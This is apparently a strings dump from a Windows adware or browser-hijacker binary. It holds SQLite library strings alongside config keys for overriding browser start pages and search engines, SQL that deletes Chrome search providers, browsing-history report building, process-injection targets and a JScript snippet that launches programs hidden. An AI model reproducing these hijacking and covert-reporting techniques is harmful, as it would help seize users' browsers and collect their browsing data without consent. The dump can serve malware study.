wFzSF/NcvveWIPceTitVXSx5V6KEMOmO9a8dbLLGj7wxi CD8aPNkL axxoWufJlAgNxC5vXoEVAtplK0CHRgJ/wFPHmREGEF7NKP9A1ATHTHzs97I04evT1dSc49oXK9XKbkx4nNsdwgeSdyWVKCABqAz9kVRVIom17pjwW8hc2JMJMhfEYUhDTenPgRu39cVRdPbHRBv9RULbqFimTLA6Ty1z2vN d RyOelC1Br/KCR1gs3 82Cpw9ANMYOUJSuSRxU/0yUKmboVum8icoM 1NpWi o wNKF/mtSGBg2O7QHI1qiCaEFr4JJ1dCTCibfvDUMgTIY4O6BS09dnfU66wIflATHfn3Vmz2O50icTeJCWKS1jbawYcRi18oLSBwmpPDXEo2PN7yZL9HUZF1QouUtVmHVEdUE4rQByTqa1MVsX86qDqtUnory9jONYV/vH7d4ez2KHSdPTt9xp3DAUH6A6dfyDIuV/9p42DDcXnW76lM3U/CsGM D9wFWiE46fRg5YU7GaujJWF04ZND7q gtbYPtbQ5 c5GicyYhXm7 JEE0t2 umb1A3XkLpWHPgOskn6nDRqT8pogSUQIwAhh71cUWkOGDMbcf JXOSMxXP9kIlF0Hl83ZsuwOnCxDcq7fa7o4mw/XZQgWJ7s4hA8s3/oev6/GtZX1KRw0qxgWbFSByNpU9rJc7akt9ZTVy19DUC2bVf/S7 mDmdLTLXknZuoeYWL /Yu/KMHimnmPc3VbRijG9yMq346J4Uzg qdOxn2P9sq2/IGUhNgRHnYhWUtJpyCaS7J8aQXHlRip23vRRFZdpWvqMNS9BWHDk1ISh5GUkediSGfX6oTEL2qol6OQQa4sXuy2Ei75O6Mdxd8rEdObV9Nr8FAW0IXJI93aPpDKjCx12PbNKFWnWXhtfxNKNQd9uTCY=

2, 1, 9, 476

Envelop.xml

Configuration.xml

UrlSet

Opera

StartPageUrl

AboutTabUrl

SearchScopeUrl

SearchScopeIconUrl

SearchScopeSuggestUrl

DefaultProviderSearchUrl

DefaultProviderIconUrl

DefaultProviderSuggestUrl

SearchPluginUrl

SearchPluginSuggestionUrl

TabPageUrl

SearchEngineFaviconUrl

SearchEngineSuggestionUrl

SearchEngineSearchUrl

SearchEngineKeyword

System.xml

Reset-2.1.0.7

UpdateUrl

ReportUrl

ReportDlls

User.xml

urls

SELECT * FROM urls

ERROR: %s

WebData path:

Argument.GeneralConfig:

Argument.Snapshot:

Argument.Flags:

suggest_url

originating_url

favicon_url

keyword

keyword LIKE '

keywords

WHERE key = 'Default Search Provider ID'

key = 'Default Search Provider ID'

DELETE from keywords WHERE id =

search_url

icon_url

startup_urls

urls_to_restore_on_startup

chrome_url_overrides

template_url_data

www-searching.com

image_url_post_params

instant_url

instant_url_post_params

new_tab_url

search_terms_replacement_key

search_url_post_params

suggestions_url

suggestions_url_post_params

chrome_settings_overrides

session.startup_urls

web_url

search_icon.png

select count(*) from sqlite_master where type = 'table' and name = '

%d-%m-%Y %H:%M, %a

large file support is disabled

SQL logic error or missing database

foreign_keys

sqlite_compileoption_get

sqlite_compileoption_used

sqlite_source_id

sqlite_version

sqlite_attach

sqlite_detach

sqlite_stat1

sqlite_rename_parent

sqlite_rename_trigger

sqlite_rename_table

RowKey

SQLITE_

d-d-d d:d:d

d:d:d

d-d-d

failed to allocate %u bytes of memory

failed memory resize %u to %u bytes

922337203685477580

API call with %s database connection pointer

%s-shm

%s\etilqs_

OsError 0x%x (%u)

Recovered %d frames from WAL file %s

invalid page number %d

2nd reference to page %d

Failed to read ptrmap key=%d

Bad ptr map entry key=%d expected=(%d,%d) got=(%d,%d)

%d of %d pages missing from overflow list starting at %d

failed to get page %d

freelist leaf count too big on page %d

Page %d:

unable to get the page. error code=%d

btreeInitPage() returns error code %d

On tree page %d cell %d:

On page %d at right child:

Corruption detected in cell %d on page %d

Multiple uses for byte %d of page %d

Fragmentation of %d bytes reported as %d on page %d

Page %d is never used

Pointer map page %d is referenced

Outstanding page count goes from %d to %d during this analysis

keyinfo(%d

%s(%d)

%s-mjX

foreign key constraint failed

unable to use function %s in the requested context

bind on a busy prepared statement: [%s]

zeroblob(%d)

abort at %d in [%s]: %s

constraint failed at %d in [%s]

cannot open savepoint - SQL statements in progress

no such savepoint: %s

cannot %s savepoint - SQL statements in progress

cannot rollback transaction - SQL statements in progress

cannot commit transaction - SQL statements in progress

sqlite_temp_master

sqlite_master

SELECT name, rootpage, sql FROM '%q'.%s WHERE %s ORDER BY rowid

cannot change %s wal mode from within a transaction

database table is locked: %s

statement aborts at %d: [%s] %s

cannot open virtual table: %s

cannot open view: %s

no such column: "%s"

foreign key

indexed

cannot open %s column for writing

cannot open value of type %s

misuse of aliased aggregate %s

%s: %s.%s.%s

%s: %s.%s

%s: %s

not authorized to use function: %s

%r %s BY term out of range - should be between 1 and %d

too many terms in %s BY clause

Expression tree is too large (maximum depth %d)

variable number must be between ?1 and ?%d

too many SQL variables

too many columns in %s

misuse of aggregate: %s()

%.*s"%w"%s

%s%.*s"%w"

%s OR name=%Q

there is already another table or index with this name: %s

sqlite_

table %s may not be altered

view %s may not be altered

UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;

UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d 18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');

sqlite_sequence

UPDATE "%w".sqlite_sequence set name = %Q WHERE name = %Q

UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;

Cannot add a PRIMARY KEY column

UPDATE "%w".%s SET sql = substr(sql,1,%d) || ', ' || %Q || substr(sql,%d) WHERE type = 'table' AND name = %Q

sqlite_altertab_%s

CREATE TABLE %Q.%s(%s)

DELETE FROM %Q.%s WHERE tbl=%Q

SELECT idx, stat FROM %Q.sqlite_stat1

invalid name: "%s"

too many attached databases - max %d

database %s is already in use

unable to open database: %s

no such database: %s

cannot detach database %s

database %s is locked

%s %T cannot reference objects in database %s

access to %s.%s.%s is prohibited

access to %s.%s is prohibited

object name reserved for internal use: %s

there is already an index named %s

too many columns on %s

duplicate column name: %s

default value of column [%s] is not constant

table "%s" has more than one primary key

AUTOINCREMENT is only allowed on an INTEGER PRIMARY KEY

no such collation sequence: %s

CREATE %s %.*s

UPDATE %Q.%s SET type='%s', name=%Q, tbl_name=%Q, rootpage=#%d, sql=%Q WHERE rowid=#%d

CREATE TABLE %Q.sqlite_sequence(name,seq)

view %s is circularly defined

UPDATE %Q.%s SET rootpage=%d WHERE #%d AND rootpage=#%d

table %s may not be dropped

use DROP TABLE to delete table %s

use DROP VIEW to delete view %s

DELETE FROM %s.sqlite_sequence WHERE name=%Q

DELETE FROM %Q.%s WHERE tbl_name=%Q and type!='trigger'

DELETE FROM %Q.sqlite_stat1 WHERE tbl=%Q

foreign key on %s should reference only one column of table %T

number of columns in foreign key does not match the number of columns in the referenced table

unknown column "%s" in foreign key definition

indexed columns are not unique

table %s may not be indexed

views may not be indexed

virtual tables may not be indexed

there is already a table named %s

index %s already exists

sqlite_autoindex_%s_%d

table %s has no column named %s

CREATE%s INDEX %.*s

INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);

no such index: %S

index associated with UNIQUE or PRIMARY KEY constraint cannot be dropped

DELETE FROM %Q.%s WHERE name=%Q

DELETE FROM %Q.sqlite_stat1 WHERE idx=%Q

a JOIN clause is required before %s

unable to identify the object to be reindexed

table %s may not be modified

cannot modify %s because it is a view

foreign key mismatch

table %S has %d columns but %d values were supplied

%d values for %d columns

table %S has no column named %s

%s.%s may not be NULL

PRIMARY KEY must be unique

sqlite3_extension_init

unable to open shared library [%s]

no entry point [%s] in shared library [%s]

error during initialization: %s

automatic extension loading failed: %s

foreign_key_list

*** in database %s ***

unsupported encoding: %s

malformed database schema (%s)

%s - %s

unsupported file format

SELECT name, rootpage, sql FROM '%q'.%s ORDER BY rowid

database schema is locked: %s

unknown or unsupported join type: %T %T%s%T

RIGHT and FULL OUTER JOINs are not currently supported

a NATURAL join may not have an ON or USING clause

cannot have both ON and USING clauses in the same join

cannot join using column %s - column not present in both tables

%s.%s

%s:%d

ORDER BY clause should come after %s not before

LIMIT clause should come after %s not before

SELECTs to the left and right of %s do not have the same number of result columns

no such index: %s

sqlite_subquery_%p_

no such table: %s

sqlite3_get_table() called with two or more incompatible queries

cannot create %s trigger on view: %S

cannot create INSTEAD OF trigger on table: %S

INSERT INTO %Q.%s VALUES('trigger',%Q,%Q,0,'CREATE TRIGGER %q')

no such trigger: %S

-- TRIGGER %s

no such column: %s

PRAGMA vacuum_db.synchronous=OFF

SELECT 'CREATE TABLE vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE type='table' AND name!='sqlite_sequence' AND rootpage>0

SELECT 'CREATE INDEX vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE sql LIKE 'CREATE INDEX %'

SELECT 'CREATE UNIQUE INDEX vacuum_db.' || substr(sql,21) FROM sqlite_master WHERE sql LIKE 'CREATE UNIQUE INDEX %'

SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0

SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'

SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';

INSERT INTO vacuum_db.sqlite_master SELECT type, name, tbl_name, rootpage, sql FROM main.sqlite_master WHERE type='view' OR type='trigger' OR (type='table' AND rootpage=0)

UPDATE %Q.%s SET type='table', name=%Q, tbl_name=%Q, rootpage=0, sql=%Q WHERE rowid=#%d

vtable constructor failed: %s

vtable constructor did not declare schema: %s

no such module: %s

table %s: xBestIndex returned an invalid plan

at most %d tables in a join

cannot use index: %s

TABLE %s

%s AS %s

%s WITH AUTOMATIC INDEX

%s WITH INDEX %s

%s VIA MULTI-INDEX UNION

%s USING PRIMARY KEY

%s VIRTUAL TABLE INDEX %d:%s

%s ORDER BY

the INDEXED BY clause is not allowed on UPDATE or DELETE statements within triggers

the NOT INDEXED clause is not allowed on UPDATE or DELETE statements within triggers

unable to close due to unfinished backup operation

unknown database: %s

no such vfs: %s

database corruption at line %d of [%.10s]

misuse at line %d of [%.10s]

cannot open file at line %d of [%.10s]

Argument.StartPage:

Argument.Autosearch:

Argument.NewTabPageShow:

Argument.SearchScopeId:

Argument.Tabs:

C:\BUILDS\Build_Watchman\Ver2\Speedbit.Watchman\Bin\SearchModulePlus_SearchModulePlus\Win32\WinMV\Release\smu.pdb

SHELL32.dll

SHLWAPI.dll

KERNEL32.dll

USER32.dll

RegOpenKeyExA

RegCloseKey

RegOpenKeyExW

ADVAPI32.dll

ole32.dll

OLEAUT32.dll

MSVCP90.dll

MSVCR90.dll

_amsg_exit

_crt_debugger_hook

WinHttpReceiveResponse

WinHttpSendRequest

WinHttpConnect

WinHttpCloseHandle

WinHttpQueryDataAvailable

WinHttpOpen

WinHttpOpenRequest

WinHttpReadData

WinHttpGetIEProxyConfigForCurrentUser

WINHTTP.dll

GetExtendedTcpTable

IPHLPAPI.DLL

WS2_32.dll

PSAPI.DLL

WTSAPI32.dll

Secur32.dll

CryptMsgClose

CertGetNameStringW

CertFreeCertificateContext

CertFindCertificateInStore

CertCloseStore

CryptMsgGetParam

CRYPT32.dll

USERENV.dll

CreatePipe

ConnectNamedPipe

CreateNamedPipeW

GetNamedPipeInfo

DisconnectNamedPipe

GetProcessHeap

RegCreateKeyW

RegCreateKeyExW

RegOpenKeyW

RegQueryInfoKeyW

RegDeleteKeyA

RegDeleteKeyW

RegEnumKeyExA

RegCreateKeyA

RegCreateKeyExA

RegQueryInfoKeyA

RegOpenKeyA

RegEnumKeyExW

RegEnumKeyW

.?AVImplementation@ReportBuilder@Monitor@SpeedBit@@

.?AVReportBuilder@Monitor@SpeedBit@@

.?AVHistoryReportFactory@Implementation@ServerReporter@Monitor@SpeedBit@@

.?AVReportFactory@Implementation@ServerReporter@Monitor@SpeedBit@@

.?AVImplementation@ServerReporter@Monitor@SpeedBit@@

.?AVServerReporter@Monitor@SpeedBit@@

.?AVEventHandler@SendReportTask@Implementation@WatchmanMonitor@Monitor@SpeedBit@@

.?AVSendReportTask@Implementation@WatchmanMonitor@Monitor@SpeedBit@@

.?AVProfile@Implementation@InstallInfo@Firefox@SpeedBit@@

.?AVInstallInfo@Implementation@0Firefox@SpeedBit@@

.?AVProfile@InstallInfo@Firefox@SpeedBit@@

.?AVInstallInfo@Firefox@SpeedBit@@

.?AVImplementation@PipedProcess@Utils@SpeedBit@@

.?AVPipedProcess@Utils@SpeedBit@@

.?AVImplementation@MachineKey@Utils@SpeedBit@@

.?AVMachineKey@Utils@SpeedBit@@

.?AVFirefoxSettings@Implementation@Snapshot@Injection@SpeedBit@@

.?AVChromeSettings@Implementation@Snapshot@Injection@SpeedBit@@

.?AVSettings@Firefox@Snapshot@Injection@SpeedBit@@

.?AVSettings@Chrome@Snapshot@Injection@SpeedBit@@

.?AVUrlSet@Implementation@General@Config@SpeedBit@@

.?AVFirefoxValueSet@Implementation@General@Config@SpeedBit@@

.?AVChromeValueSet@Implementation@General@Config@SpeedBit@@

.?AVOperaSettings@Implementation@General@Config@SpeedBit@@

.?AVFirefoxSettings@Implementation@General@Config@SpeedBit@@

.?AVChromeSettings@Implementation@General@Config@SpeedBit@@

.?AVSettings@Opera@General@Config@SpeedBit@@

.?AVValueSet@Firefox@General@Config@SpeedBit@@

.?AVSettings@Firefox@General@Config@SpeedBit@@

.?AVValueSet@Chrome@General@Config@SpeedBit@@

.?AVSettings@Chrome@General@Config@SpeedBit@@

.?AVUrlSet@General@Config@SpeedBit@@

.?AVFirefoxSettings@Implementation@User@Config@SpeedBit@@

.?AVChromeSettings@Implementation@User@Config@SpeedBit@@

.?AVSettings@Firefox@User@Config@SpeedBit@@

.?AVSettings@Chrome@User@Config@SpeedBit@@

.?AVChromeBrowserHistory@SQLite@SpeedBit@@

.?AVException@sql@@

.?AVImplementation@Factory@BrowserInfo@Chrome@SpeedBit@@

.?AVFactory@BrowserInfo@Chrome@SpeedBit@@

.?AVImplementation@BrowserInfo@Chrome@SpeedBit@@

.?AVBrowserInfo@Chrome@SpeedBit@@

.?AVLoader@Extension@Chrome@SpeedBit@@

.?AVImplementation@Extension@Chrome@SpeedBit@@

.?AVExtension@Chrome@SpeedBit@@

.?AVBrowserSettings@Implementation@0Chrome@SpeedBit@@

.?AVBrowserSettings@Chrome@SpeedBit@@

.?AVImplementation@WebDataDB@SQLite@SpeedBit@@

.?AVWebDataDB@SQLite@SpeedBit@@

.?AVBrowserSettings@Implementation@0Firefox@SpeedBit@@

.?AVBrowserSettings@Firefox@SpeedBit@@

<requestedExecutionLevel level="highestAvailable" uiAccess="false"></requestedExecutionLevel>

<assemblyIdentity type="win32" name="Microsoft.VC90.CRT" version="9.0.21022.8" processorArchitecture="x86" publicKeyToken="1fc8b3b9a1e18e3b"></assemblyIdentity>

</assembly>PADif (WScript.Arguments.length > 0)

var root = WScript.Arguments(0);

for (var i = 1, n = WScript.Arguments.length; i < n;   i)

args.push(WScript.Arguments(i));

var path = "\""   root.replace(/\\*$/, "").replace(/\//g, "\\")   "\"";

path  = " \""   args.join("\" \"")   "\"";

var shell = WScript.CreateObject("WScript.Shell");

shell.Run(path, 0, false);

0%0 01070

2(2-272[2

3#3-323<3`3

8„8C8[8

5)686=6{6

2%2U2h2

4%4u4|4

0(0;0`0}0

5&515?5[5

6'626@6\6{6

!00050=0

2,2U2f2x2

4)545?5|5

<'<0<;<`<

11\1{1

;7;<;[;`;

0!030`0}0

50656=6|6

7$7-787]7

6!6)6:6~6

2$3(3,3034383<3@3

7"7(7,7:7

1"2-2H2Q2}2

5(5!9&939

9!9(9/959

4W5D5

6q7:7]7

0
0=0`0

<&<2<;<^<

4L4j4

: :$:0:4:8:

2 2$2(2,2024282<2|4

8$8(8,8084888

= =$=(=,=0=4=8=<=

? ?$?(?,?0?4?8?

> >$>(>,>0>4>8><>

Injection::Snapshot::Controller::IsChromeInstalled

Chrome installed:

Injection::Snapshot::Controller::IsFirefoxInstalled

Firefox installed:

Chrome unchanged:

Firefox unchanged:

Checking<Parameter.Input>

Checking<Parameter.Key>

logs\${ModuleName}.${Pid}.log

WatchmanKey::TimeBomb::UninstallTimeBomb

Reporting

ChromeExtensionMonitorWorkerThread started

ChromeExtensionMonitor::CollectExtensionInfo

ChromeExtensionMonitor::CheckExtension

8Reset DNS to 8.8.8.8 for adapter

WinHTTP Example/1.0

VVV.google.com

SOFTWARE\Google\Chrome

SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows

Registry::Helper::RegOpenKeyExA

Chrome::StartPageProtectionEnabled

Chrome::SearchEngineProtectionEnabled

Chrome::RestoreOnStartupProtectionEnabled

Chrome::StartPageProtectionDisabled

Chrome::SearchEngineProtectionDisabled

Chrome::RestoreOnStartupProtectionDisabled

Firefox::StartPageChangedByUser

Firefox::SearchEngineChangedByUser

Explorer.HomePageEvent:

Explorer.SearchEngineEvent:

Firefox.HomePageEvent:

Firefox.SearchEngineEvent:

ProcessCatcher::ExecutionContext::Resume

Allocation<ExecutionContext>

iexplore.exe

rundll32.exe

chrome.exe

firefox.exe

opera.exe

safari.exe

navigator.exe

torch.exe

U.exe

epic.exe

browser.exe

Maxthon.exe

sbframe.exe

avant.exe

dragon.exe

bobrowser.exe

ProcessMonitor::ExecutionContext::Resume

E:\iexplore.exe|E:\rundll32.exe

E:\chrome.exe

E:\firefox.exe

E:\opera.exe

E:\Safari.exe|E:\navigator.exe|E:\torch.exe|E:\U.exe|E:\epic.exe|E:\browser.exe|E:\Maxthon.exe|E:\sbframe.exe|E:\avant.exe|E:\dragon.exe|E:\bobrowser.exe

smei32.dll

smci32.dll

smfi32.dll

smoi32.dll

smri32.dll

smi32.exe

Utils::PipedProcess::Create

Utils::PipedProcess::Start

Utils::PipedProcess::WriteData

[ReportDllsThread]

ProcessWatcher::ExecutionContext::Resume

Local proxy port:

127.0.0.1

[ProxyMonitor::getProcessByPort]

Failed to get GetExtendedTcpTable

[ReportBuilder::MakeDefaultBrowserSettingsElement]

[ReportBuilder::CalculateHash]

Result.Hash:

[ReportBuilder::MakeHistoryReport]

Building history report...

ReportBuilder::GetWMISystemInfo

ReportBuilder::GetExplorerBrowserInfo

ReportBuilder::GetChromeBrowserInfo

. Chrome Search:

History Report:

[ReportBuilder::MakeReport]

Report:

[ReportBuilder::GetExplorerBrowserInfo]

[ReportBuilder::GetChromeBrowserInfo]

Chrome::BrowserInfo::Factory::Create

Chrome::BrowserInfo::Factory::GetInfo

sma.exe

Utils::PipedProcess::ReadData

Utils::PipedProcess::Wait

Utils::PipedProcess::WriteEof

777705555443332

5555443332

5555443332

Utils::MachineKey::Create

Utils::MachineKey::Generate

Encrypt data. Key:

Decrypt data. Key:

ReportBuilder::MakeInstallReport

[ServerReporter::SendInstallReport]

ReportBuilder::MakeUninstallReport

[ServerReporter::SendUninstallReport]

ReportBuilder::MakeRegulatReport

[ServerReporter::SendRegularReport]

ReportBuilder::MakeUserActionReport

[ServerReporter::SendUserActionReport]

ReportBuilder::MakeHistoryReport

[ServerReporter::SendHistoryReport]

ServerReporter::MakeReport

ServerReporter::SendReport

[ServerReporter::SendReport]

ServerEncryption::CreateSessionKey

Report in Base 64:

10D2FBE6-2346-4627-A9F5-FB48313C5001

ServerReporter::Implementation::GetTargetUrl - User GUID is problematic GUID (hardcoded/unknown)

ServerReporter::Implementation::GetTargetUrl - Failed replacing problematic GUID with new one

[ServerReporter::GetUserProfile]

[ServerReporter::MakeReport]

ServerReporter::GetUserProfile

ReportBuilder::Create

Result.Report:

[ServerReporter::SetLastReportTime]

WatchmanKey::Reporter::SetLastTime

Package url:

WatchmanKey::Updater::SetLastTime

.Service

\Microsoft\Windows\Start Menu

*.lnk

\Internet Explorer\iexplore.exe

\Safari\Safari.exe

/report

/report1

%d.%d.%d.%d%n

Created URL Set object from configuration. Name:

UrlSetID:

Could not find matching URL set... Using old configuration

[LocalScope::UpdateParser::ParseReportSection]

Monitor::ServerEncryption::CreateSessionKey

Full url:

Data url:

sbu.exe

smw.sys

wscript.exe

smhe.js

[Monitor::WatchmanGuard::SendReport]

InstallReporter

Monitor::ServerReporter::Create

Monitor::ServerReporter::SendInitialReport

/urlset:

Options.InjectAllBrowsers:

Options.InjectDefaultOnly:

Options.ServiceName:

Options.ProductCode:

Options.ProductPriority:

Options.EnablePinner:

Options.EnableRedirect:

Options.EnableYellowBandSuppression:

Options.UpdateUrl:

Options.ReportUrl:

Options.AutoStart:

Options.ProtectSearch:

Options.ProtectHome:

Options.ProtectTab:

Options.ExplorerInjection:

Options.ChromeInjection:

Options.FirefoxInjection:

Options.OperaInjection:

Options.ConfigPath:

Options.ConfigKey:

Getting current URL Set

Getting URL Set from options

] Provided. And is different from current URL set [

URL Set [

Need to send report!!!

ServerReporter::Create

Original report URL:

URL to use:

ServerReporter::SendInitialReport

general_config.xml

system_config.xml

[WatchmanInstaller::SendReport1]

iexplore.exe is running, result for getting DLL's:

firefox.exe is running, result for getting DLL's:

chrome.exe is running, result for getting DLL's:

ServerReporter::SendRegularReport

[WatchmanInstaller::SendReport]

ServerReporter::SendHistoryReport

Currently set URLSet:

Updating system config with new URL set...

Already reported duiring first install

Report' been sent:

WatchmanInstaller::SendReport1

calling SendReport1...

WatchmanInstaller::SendReport

[Monitor::WatchmanMonitor::CreateSendReportTask]

SendReportTask

new<SendReportTask>

[Monitor::WatchmanMonitor::OnSendReportSucceeded]

[Monitor::WatchmanMonitor::OnSendReportFailed]

[Monitor::WatchmanMonitor::OnChromeProtectionChanged]

User has changed the chrome protection for:

[Monitor::WatchmanMonitor::OnResetFirefoxProtection]

User has reset the firefox protection:

Next report task:

Scheduller::RegisterTask<SendReportTask>

Monitor::Application::EnsureSystemKey

Options.Revert:

Settings.Final:

UninstallReporter

profiles.ini

prefs.js

Mozilla\Firefox\

[Firefox::InstallInfo::ReadProfiles]

[Firefox::InstallInfo::ParseProfiles]

[Firefox::InstallInfo::QueryProfiles]

Firefox::InstallInfo::ReadProfiles

Firefox::InstallInfo::ParseProfiles

[Firefox::InstallInfo::Query]

SHELL32.DLL

No profiles found! Maybe - first start of Firefox?

ADVAPI32.DLL

shlwapi.dll

Utils::Registry::OpenKeyExW

Subkey:

[Utils::Registry::RecursiveDeleteKeyW]

SHLWAPI.GetAddressOf<SHDeleteKeyW>

WKERNEL32.DLL

VERSION.DLL

NTDLL.DLL

[Utils::PipedProcess::CreateOutputHandles]

[Utils::PipedProcess::CreateInputHandles]

[Utils::PipedProcess::SpawnProcess]

Utils::PipedProcess::CreateOutputHandles

Utils::PipedProcess::CreateInputHandles

Utils::PipedProcess::SpawnProcess

[Utils::PipedProcess::Start]

[Utils::PipedProcess::Wait]

Utils::PipedProcess::WriteProc

[Utils::PipedProcess::WriteData]

Utils::PipedProcess::ReadProc

[Utils::PipedProcess::ReadData]

.cache

SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall

ntdll.dll

Could not create memory object. Object name: %s. %%s

Could not open memory object. Object name: %s. %%s

Could not map memory object. Object name: %s. %%s

Could not map memory object. Object name: %s. Size: %u. %%s

Could not create sync object for memory. Object name: %s. %%s

pathToSignedProductExe

SELECT * FROM Win32_OperatingSystem

A[BrowserHistory::GetPropertyReport]

Found URL:

GIPHLPAPI.DLL

GX-hX-hX-XX-XXXXXX

\\.\pipe\

Could not create thread event. %%s

Could not create new client event. %%s

Could not create accept thread. %%s

Could not create work thread. %%s

Could not start thread. %%s

Stop IPC error. %%s

Pipe (0x%X) read problems. %%s

IAction::QueryInterface<IExecAction>

IExecAction::put_Path

IExecAction::put_WorkingDirectory

IExecAction::put_Arguments

Ghttp\shell\open\command

Software\Microsoft\Windows\CurrentVersion\App Paths

[Utils::SoftwareInfo::GetHttpOpenHandler]

Utils::Registry::OpenKeyW

[SynchronousPipe::Write]

[SynchronousPipe::Read]

SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy

Not enough memory. Size: %s (%s)

Error code: %u ('%s')

Could not allocate IPC memory. Requires size: %u

Could not create pipe. %%s

Could not create pipe event. %%s

Event error. %%s

Pipe connecting error. %%s

HCould not create IPC event. %%s

yIEXPLORE.EXE

SuggestionURL

FaviconURL

TopResultURLFallback

Software\Microsoft\Internet Explorer\AboutURLs

Software\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects

Software\Microsoft\Windows\CurrentVersion\Ext\Settings

Failed to call enum URL's. Error:

[Injection::Snapshot::Chrome::Settings::Dump]

[Injection::Snapshot::Firefox::Settings::Dump]

[Monitor::RestoreData::Controller::Build<ChromeSettings>]

[Monitor::RestoreData::Controller::Build<FirefoxSettings>]

[Injection::Snapshot::Builder::BuildSettings<ChromeSettings>]

[Injection::Snapshot::Builder::BuildSettings<FirefoxSettings>]

new<ChromeSettings>

Injection::Snapshot::Parser::Parse<ChromeSettings>

new<FirefoxSettings>

Injection::Snapshot::Parser::Parse<FirefoxSettings>

ReadStringNode<AboutTabsUrl>

[Injection::Snapshot::Parser::Parse<ChromeSettings>]

ReadStringNode<DefaultProviderKeyword>

[Injection::Snapshot::Parser::Parse<FirefoxSettings>]

[Injection::Snapshot::Controller::IsChromeInstalled]

Chrome::BrowserSettings::Create

[Injection::Snapshot::Controller::IsFirefoxInstalled]

Firefox::BrowserSettings::Create

Chrome::BrowserSettings::RestoreState

Firefox::BrowserSettings::RestoreState

Argument.SystemConfig:

Argument.Config::General:

Argument.Config::User:

Chrome::BrowserSettings::PropagateState

Firefox::BrowserSettings::PropagateState

Argument.UserSid:

WatchmanKey::Users::SaveRestoreData

[WatchmanKey::GetEncryptionKey]

MachineKey::Create

MachineKey::Generate

[WatchmanKey::CleanupKey]

[WatchmanKey::LoadEncodedData]

WatchmanKey::GetEncryptionKey

[WatchmanKey::SaveEncodedData]

[WatchmanKey::System::LoadGeneralConfig]

WatchmanKey::System::Open

WatchmanKey::LoadEncodedData

[WatchmanKey::System::SaveGeneralConfig]

WatchmanKey::System::Ensure

WatchmanKey::SaveEncodedData

[WatchmanKey::System::LoadSystemConfig]

[WatchmanKey::System::SaveSystemConfig]

[WatchmanKey::Users::Ensure]

WatchmanKey::EnsureKey

[WatchmanKey::Users::Open]

WatchmanKey::OpenKey

[WatchmanKey::Users::LoadConfiguration]

WatchmanKey::Users::Ensure

[WatchmanKey::Users::SaveConfiguration]

[WatchmanKey::Users::LoadRestoreData]

[WatchmanKey::Updater::SetLastTime]

[WatchmanKey::Updater::SetBlackListHash]

[WatchmanKey::Updater::GetBlackListHash]

[WatchmanKey::Reporter::GetLastTime]

[WatchmanKey::Reporter::SetLastTime]

[WatchmanKey::TimeBomb::Uninstall]

WatchmanKey::SystemKey::Open

smod.xml

SearchModulePlus.crx

{7F4EFF06-7032-458e-AE16-1C1D8255C28A}

{CFBFAE00-17A6-11D0-99CB-00C04FD64497}

hXXp://api.searchpredict.com/api/?rqtype=ffplugin&siteID=8661&dbCode=1&command={searchTerms}

DATAMNGR.DLL

IEBHO.DLL

[Config::General::UrlSet::Copy]

[Config::General::Chrome::Settings::Dump]

[Config::General::Chrome::Settings::Copy]

[Config::General::Chrome::ValueSet::Copy]

[Config::General::Firefox::Settings::Dump]

[Config::General::Firefox::Settings::Copy]

[Config::General::Firefox::ValueSet::Copy]

[Config::General::Opera::Settings::Dump]

[Config::General::Opera::Settings::Copy]

Config::General::Parser::ParseUrlSet

Config::General::Parser::ParseChromeSettings

Config::General::Parser::ParseFirefoxSettings

Config::General::Parser::ParseOperaSettings

ReadStringNode<StartPageUrl>

lReadStringNode<AboutTabUrl>

ReadStringNode<SearchScopeUrl>

ReadStringNode<SearchScopeIconUrl>

ReadStringNode<SearchScopeSuggestUrl>

[Config::General::Parser::ParseChromeSettings]

MissedElement<GoogleChrome>

Config::General::Parser::ParseChromeValueSets

[Config::General::Parser::ParseChromeValueSets]

ReadStringNode<HomePageUrl>

ReadStringNode<DefaultProviderSearchUrl>

ReadStringNode<DefaultProviderIconUrl>

ReadStringNode<DefaultProviderSuggestUrl>

[Config::General::Parser::ParseFirefoxSettings]

MissedElement<MozillaFirefox>

Config::General::Parser::ParseFirefoxValueSets

[Config::General::Parser::ParseFirefoxValueSets]

ReadOptionalStringNode<HomePageUrl>

ReadOptionalStringNode<SearchPluginUrl>

ReadOptionalStringNode<SearchPluginSuggestionUrl>

[Config::General::Parser::ParseUrlSet]

MissedElement<UrlSet>

ReadStringNode<TabPageUrl>

ReadStringNode<SearchEngineFaviconUrl>

ReadStringNode<SearchEngineSuggestionUrl>

ReadStringNode<SearchEngineSearchUrl>

dReadStringNode<SearchEngineKeyword>

[Config::General::Parser::ParseOperaSettings]

MissedElement<Opera>

yReadStringNode<Key>

[Config::General::Builder::Build<ChromeSettinsg>]

[Config::General::Builder::Build<FirefoxSettinsg>]

[Config::General::Builder::Build<OperaSettinsg>]

We couldn't find the URL Set section... probably an old configuration!

WatchmanKey::System::LoadGeneralConfig

WatchmanKey::System::SaveGeneralConfig

JReset-2.1.0.7

2.1.0.7

2.0.0.0

ReadOptionalStringNode<UrlSet>

ReadStringNode<UpdateUrl>

ReadStringNode<ReportUrl>

ReadBooleanNode<GoogleChrome>

ReadBooleanNode<MozillaFirefox>

ReadBooleanNode<Opera>

